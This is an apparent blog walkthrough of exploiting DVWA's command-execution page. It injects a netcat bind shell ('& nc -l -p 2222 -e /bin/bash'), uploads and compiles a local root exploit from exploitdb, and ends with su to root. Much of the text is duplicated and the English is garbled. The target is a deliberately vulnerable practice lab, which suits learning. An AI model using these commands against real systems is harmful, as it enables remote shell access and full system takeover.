DVWA:Command Execution(Update)
here I will try to gain root access to the target of dvwa. Here the target is also backtrack ^ _ ^ and security level medium
just enter the command as below,
192.168.43.1 & ls
then we will get a list of directories
wrote again the following command
192.168.43.1 & nc -l -p 2222 -e /bin/bash
what happened?
the victim was waiting,
we try nc
yap it turns out the victim to accept, because I use the more simple nc how it works, next we will upload a local exploit
do as the steps below
if you've uploaded the file to your computer 18411.c victim, it is that we use a local exploit, and if you update exploits can certainly be found in exploitdb
(I have yet to update the exploit)
after the uploaded file to do the execution of the file, but before gcc first
get used to upload files to a place that has the highest privileges :)
and checking with ls -lia
then execution
after waiting a while it exploits local open
for to root type the command SU
just enter the command as below,
192.168.43.1 & ls
then we will get a list of directories
wrote again the following command
192.168.43.1 & nc -l -p 2222 -e /bin/bash
what happened?
the victim was waiting,
we try nc
yap it turns out the victim to accept, because I use the more simple nc how it works, next we will upload a local exploit
do as the steps below
if you've uploaded the file to your computer 18411.c victim, it is that we use a local exploit, and if you update exploits can certainly be found in exploitdb
(I have yet to update the exploit)
after the uploaded file to do the execution of the file, but before gcc first
get used to upload files to a place that has the highest privileges :)
then execution
after waiting a while it exploits local open
for to root type the command SU
Comments
Post a Comment